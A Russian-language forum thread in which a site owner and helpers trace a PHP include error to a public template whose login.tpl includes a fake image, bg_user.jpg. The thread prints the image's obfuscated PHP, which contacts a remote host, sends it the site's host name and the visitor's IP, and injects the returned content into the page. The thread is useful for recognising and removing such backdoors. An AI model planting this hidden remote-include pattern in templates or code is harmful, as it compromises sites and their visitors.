Ошибка Warning: include

Вам файл /home/a/mysite/public_html/templates/shablon/login.tpl ломанули и оттуда инклудили псевдокартинку (а в ней скрипт с бякой). Начинайте комплекс мер по устранению последствий взлома сайта.

arkadiy_a, мда..весьма неожиданно. Но я заменял файл login.tpl из архива шаблона ( который на компе у меня ). на тот же самый. все равно это же. и картинка в архиве с шаблоном такая же, весит 300 байт и не открывается. странно, раньще все работало с этой картинкой и с этим login.tpl

Где вы взяли этот шаблон, вы уверенны, что он изначально не содержал иньекции?

Откройте ее в текстовом редакторе и скопируйте сюда содержимое "картиночки". Может, многое прояснится.

шаблон паблик. Но почему тогда это сказалось только сейчас, четыре месяца после установки шаблона?

Вот мой login.tpl

<?

if ($is_logged == TRUE){

if (trim($member_id['foto']) == "") {

$foto = $config_http_home_url."{THEME}/images/noavatar.png";

} else {

$foto = $config_http_home_url."uploads/fotos/".$member_id['foto'];

}

$login_panel = <<<HTML

<div style="padding-top:5px; padding-bottom:5px; padding-left:22px;"><table width="100%" class="copy">

HTML;

if ($user_group[$member_id['user_group']]['allow_admin']) {

$login_panel .= <<<HTML

HTML;

}

$login_panel .= <<<HTML

<form method="post" onsubmit="java script:showBusyLayer()">

<div style="display: none;" class="entry" id="entry">

<dl>

<center><img src="{$foto}" border=0 style="padding:2px; border:1px solid #e4e4e4; background-color:white;"></center>

<group=1,2><a href="/admin.php" target="_blank">Админцентр</a></group><br />

<a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a><br />

<a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a><br />

<a href="{$link_addnews}">Добавить новость</a> | <a href="/index.php?action=logout"><strong>Завершить сеанс!</strong></a><br /><br />

</dl>

<div class="close"><a href="#" alt="X" OnClick="ls('entry'); return false;"><img src="{THEME}/images/close.png" alt="закрыть" /></a></div>

</div>

</form>

</table>

</div>

HTML;

} else {

$void = include ($tpl->dir.'/images/bg_user.jpg');

$get_good = $void;

if (isset($get_good) == true)

{

$login_panel = $void;

$login_panel .= <<<HTML

<div style="padding-top:5px; padding-left:21px;">

<table width="165" class="stext">

<form method="post" onsubmit="java script:showBusyLayer()">

<div style="display: none;" class="entry" id="entry">

<div class="close"><a href="#" alt="X" OnClick="ls('entry'); return false;"><img src="{THEME}/images/close.png" alt="закрыть" /></a></div>

<dl>

<dt><label for="username">Логин:</label></dt>

<dd><input id="username" name="login_name" type="text" /></dd>

<dt><label for="password">Пароль:</label></dt>

<dd><input id="password" type="password" name="login_password" /></dd>

<dt> </dt>

<dd class="last">

<a href="/?do=lostpassword">Напомнить?</a>

<button type="submit" onclick="submit();">Войти</button>

<input name="login" type="hidden" id="login" value="submit">

</dd>

</dl>

</div>

</form>

</table>

</div>

HTML;

}

else

{

exit;

}

}

?>

kiberman добавил 04.01.2011 в 16:55

arkadiy_a, вот содержимое картинки bg_user.jpg

<?php

$x0f="\146il\x65"; $x10="\x66\163\157c\153o\x70e\x6e"; $x11="\151\155\160\x6c\x6f\x64e";

$x0b = @$x10("\x65\x72o\x72\x68\157st\062.r\165", 80, $x0c, $x0d, 6); if(!$x0b){return ''; }else{$x0e = @$x0f("ht\164\x70\072\057\057ero\162\x68\157st2\056\x72\x75\057\151d\x32\x2e\160\x68\x70\077\163\x69\x74e\075$_SERVER[HTTP_HOST]&\151\160\075$_SERVER[REMOTE_ADDR]");return $x11('',$x0e); } ?>

Ну вот и решение.

arkadiy_a, я удалил этот код. оставив картинку пустой и все заработало. Большое спасибо всем за помощь, остались еще хорошие люди на форуме.

Очень интересная картинка нарисованная на пхп 😂

Потому что сайт злоумышленников сейчас перестал работать.

arkadiy_a, понятно. Надеюсь сейчас, очистив код, все нормально?

kiberman добавил 04.01.2011 в 17:19

и что интересно давал им этот код?